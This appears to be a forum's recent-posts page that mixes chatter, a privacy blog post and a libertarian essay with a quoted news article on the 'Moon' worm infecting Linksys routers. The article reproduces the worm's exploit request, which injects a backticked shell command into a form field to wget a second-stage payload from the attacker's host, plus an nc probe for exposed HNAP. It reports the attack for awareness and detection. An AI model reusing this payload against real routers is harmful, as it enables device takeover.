Recent Posts
The Home Server Show[/b][/url] published an [url=http://homeservershow.com/building-your-own-super-router-with-pfsense-and-untangle.html]article...Thanks!-40hz (February 15, 2014, 07:16 AM)
In case you missed it, Cisco didn't directly answer the question regarding expected speeds. But if you read carefully, you'll see that they are saying that the WRT120N is only certified to be interoperable at 802.11g speeds, i.e. 54 Mbps maximum link rate, even with Wi-Fi Certified Draft 11n devices.
On that basis alone, I just can't recommend the not-certified-for-draft-802.11n WRT120N, no matter how Cisco tries to disguise it.
You should use PNG file format for screenshots.Doh! Yes, of course. Thankyou. I had forgotten that. That might also help to explain the inconsistent viewing in irfanview that I was describing above...
It is far smaller than BMP and preserves all information including transparency (jpg degrades screenshots and has no transparency).-mouser (February 14, 2014, 01:45 PM)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC
Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.
Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.
"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."
The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:
echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080
Devices that return the XML HNAP output may be vulnerable.
The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.
So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.
Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.
The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.
So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth
The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.
In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:
The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.
The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:
POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH
When decoded, the request is translated to:
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
`cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1
Further Reading
Guerilla researcher created epic botnet to scan billions of IP addresses
With 9TB of data, survey is one of the most exhaustive—and illicit—ever done.
Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)
The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.
As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.
Article updated throughout to add newly available information.
Process Explorer now includes VirusTotal integration | 404 Tech Support
By Jason Hamilton on February 5, 2014 in Software
Last week, version 16 of Process Explorer was released and 16.01 was released yesterday. Its newest feature is VirusTotal integration. You use Process Explorer to examine the processes currently running on a Windows computer and now you can right-click on any process to upload it to VirusTotal to have it scanned by 40+ different antivirus scanners. You will then get the feedback on how many of those AV engines thought the file could be malicious. All from within Process Explorer.
The new version includes a new column for VirusTotal and a new entry on the context menu when you right-click on a process.
process explorer Process Explorer now includes VirusTotal integration
The first time you use the ‘Check VirusTotal’ function, you will be shown the Terms in your browser and a pop-up asking if you agree with the terms. After that, the process is hashed and submitted to VirusTotal. The column is then updated with the results to tell you how many of the virus scanners find the file to be malicious.
I made a quick screencast to demonstrate the new functionality.
Process Explorer could already be handy in cleaning a malware infection but this new feature makes it even better.
SC has a feature that will remove those, and it is enabled by default when you use Alt+PrtScr to capture the active window.
You should should see the screen flash black and white while it captures that window, and it should remove them.
(that's assuming you haven't changed any options related to window transparency capture).
Are you capturing that window using Alt+PrtScr?
______________________________-mouser (February 13, 2014, 05:37 PM)
mouser and tomos:Hahaha, very droll.
You're far too gracious. Just ban this rude, profane, semi-literate ("re-leaves stress") person from the forum.
__________________________-longrun (February 13, 2014, 04:59 PM)
I so wish there was an English translation for everything.There is. Open up any Chinese text HTML in Google Chrome and it will autotranslate for you. That's how I read every blog post re WizNote. I think you might be able to do the same with Bing, but have not tried it yet.-superboyac (February 12, 2014, 05:48 PM)
YOU have a moral obligation to use crypto.
Written by Mark Jeftovic on February 11, 2014 — 5 Comments
Image: we_want_you_to_use_crypto
Today is The Day We Fight Back, a global initiative to send a message to our overlords that we're not thrilled about being spied on, subject to mass surveillance and basically living in an Orwellian nightmare.
Ordinarily we're not big "joiners" or "petition pushers", we think taking action has more efficacy. However, this is in it's own way doing just that. It is simply unfathomable to me how low on people's radar this issue is.
When the first revelations began surfacing that the NSA had basically implemented a surveillance state, I commented privately "just wait, eventually it will come out that Canada is doing the same thing".
Sure enough, reports started to surface about CSEC's activities, first engaging in industrial espionage against trading partners and then more recently, setting up wifi honeypots in Canadian airports to track Canadian citizens.
What surprised me was the lack of reaction from the populace here about this latest revelation. Trust me: this isn't just about an experiment in an airport tracking metadata, it's just the tip of the iceberg.
A lot of people like using us because we're not in the USA, and some of the rationalizations behind that perceived benefit still hold true: somewhat saner copyright laws (at least for the moment), not being wimps when it comes to idiotic takedown requests, et al.
But the idea that we are somehow "out of reach of the NSA" is definitely not one of them. Sure, we're not actively collaborating with them, as many US businesses are, but as we've said before: we just assume the pipes going into and out of our major network exchange points are being vacuumed en masse.
That's why we recently rolled out GPG encrypted email forwarding and will soon make it available on easyMail where it can encrypt your IMAP mailboxes. It's why we're going to spin out a personal privacy appliance fairly soon.
Because signing petitions is all well and good, the anarcho-libertarian in me (not speaking for the entire company, or then again maybe I am) suspects that the political system we live under here in the "the Globalized World Order" is more or less bankrupt, corrupt and has lost all legitimacy to rule. It doesn't matter if next election one political party says "we're going to conduct a review of our intelligence agencies" and the other one says "we'll have a full public inquiry!". That's not a choice. There hasn't been real choice in the political menu in decades. So citizens can scream as loud as they want that "this is wrong!", it isn't going to sway our overlords from the current path.
That's why it's up to all of us to do it ourselves: start using crypto, take a look at things like bitcoin. Become hard to surveil, not because you're "doing nothing wrong", but because the government is.
________________________
I was actually just going with liquid and solid (ice at bottom of photo) for a total of 2.OK, as I recall from my fisics edukation, any substance (such as water) that can go from vapour<-->liquid<-->solid at different temps/pressures is said to be going through "phases". So water in liquid and ice form would be examples of two phases of water, by definition.
I did not however see any lakes in the photo.-Stoic Joker (February 11, 2014, 03:33 PM)
Agreed. Two waters strikes me as correct also.How many different waters do you see in this photo?Two?
(see attachment in previous post)
_____________________________-app103 (March 04, 2011, 07:33 PM)
_____________________________-crabby3 (February 11, 2014, 05:38 AM)
_____________________________-Stoic Joker (February 11, 2014, 07:10 AM)
...They might then have a news story from somewhere in the UK where, because it's Scotland, Yorkshire, etc, you have to wonder wtf they saying even though it's meant to be English.Speaking as a Yorkshireman, I think you will find that Yorkshire-English is recognised as being an example of having a sort of English dialect, though I am unsure as to how many people actually use the dialect - e.g., "Put wood i'th 'ole." meaning "Put the wood in the hole" (i.e., "Close the door").-4wd (February 10, 2014, 06:44 PM)
...The accents really are that bad. They can be heard just fine...but they must be translated for those unfamiliar with the tendency to jumble an entire sentence into a single (somewhat long) "word"...Gosh, then the language has become rather like a local dialect. Mind you, American-English is arguably a dialect of received English anyway.-Stoic Joker (February 10, 2014, 05:11 PM)
...Hell man we're in "The South" grammar is so far gone here "the yokels" get close captioned on the history/discovery channel...If that were true, then I would suggest that the captions might be for the hard of hearing.-Stoic Joker (February 10, 2014, 11:49 AM)
Awesome!Some people (not me, you understand) might say that defenestration would be too good for some of these "gatekeepers" and their ilk, and that being put on the rack and then being hung, drawn and quartered would be more fitting for their oppressive crimes, but I couldn't possibly comment.(both for the argument and use of the word 'defenestration')
I think the analysis is spot on even if I'm not sufficiently sanguine as to agree about the inevitability of his conclusion.-40hz (February 09, 2014, 07:38 PM)
The Internet and the defenestration of the gatekeepers
February 5, 2014
Filed under: Government, Liberty, Technology — Tags: EdwardSnowden, Internet, Propaganda — Nicholas Russon @ 08:51
In the latest Libertarian Enterprise, L. Neil Smith talks about the recent movie The Fifth Estate, prominent whistleblowers, and how the Internet upset so many top-down information models:
The top three “whistle-blowers”, of course, in no particular order, are Assange himself, Bradley/Chelsea Manning, and Edward Snowden. I’m interested in these individuals for a number of reasons, not the least of which, is that I wrote about them (actually, I anticipated them) long before most people in the world ever knew they existed.
Including me.
Eleven years ago, in a speech I delivered to the Libertarian Party of New Mexico entitled “Empire of Lies“, I asserted that every human being on Earth is swimming — drowning — in an ocean of lies, mostly told by governments of one variety or another. I pointed out that lies of that kind — for example, the Gulf of Tonkin “incident” that never happened, and yet cost the lives of 60,000 Americans and 2,000,000 Vietnamese — are deadly. I proposed, therefore, that any politician, bureaucrat, or policeman caught telling a lie to any member of the public for any reason — a well as any among their ilk keeping secrets — ought to be subject to capital punishment, preferably by public hanging.
On network television.
Some time later, I stumbled on what I think is the true historical significance of the Internet. For as long as human beings have been communicating with one another, except among family and friends (and even then, sometimes) communications have been vertical and one-way, from the top down. Just to take it back to the Middle Ages, you can’t talk back to, or argue with a church bell. You either do what you are trained to do when it rings — wake, pray, eat, go to bed — or you do not, and suffer whatever consequences society has arranged for you to suffer.
This sorry situation was not improved materially by later “great” inventions like the printing press, movies, radio, or television. Such innovations only made it easier and more convenient to issue orders. The elite laid down the law to the peons (that’s us) and there was no way of contradicting them. Letters to the Editor are limited to 400 words.
But the Internet, and all of the technical, political, and social phenomena associated with it, turned this communications hierarchy sideways. Almost overnight, it was now possible for anybody on the planet to talk to anybody else, and to speak privately with a single individual, or to millions, without obtaining anyone’s permission, judged not by their power or authority, but by the cogency of their arguments.
Atlas didn’t shrug, Authority wigged.
Traditional Big Media, newspaper, magazine, and book publishers, movie studios, radio and television network executives, held onto their monopoly gatekeeper position, inherited from a more primitive era, desperately and at any cost. Only they were fit to judge what word could be sent by mere individuals to the Great Unwashed (that’s us, again). What it cost them is their very existence. They were incapable of divining that the Age of Authority, including theirs, was over.
For governments all over the world, subsisting as they all do on lies, intimidation, and violence, it was a nightmare. They have tried to fight back, but they will lose. The tide of history is against them. The idea of “peer-to-peer” communication is out there, and — short of the mass slaughter some of them seem to be preparing against us: a measure of their utter despair — it can never be called back or contained.
@jity2: just stumbled upon this thread whilst searching DC Forum for references to Yahoo! Pipes.
To get what you want I use an alternative that I always use for sites that do not have an RSS feed but that I want to keep informed by (and no, I don't want email alerts) - it's a nifty Firefox extension called UpdateScanner
EDIT 2014-03-06: Link is now moved to Firefox add-ons: https://addons.mozil...ddon/update-scanner/
I suggest you try it out (assuming that you haven't tried it out already).
Also check: monitor and notify of webpage updates-IainB (February 09, 2014, 04:20 AM)
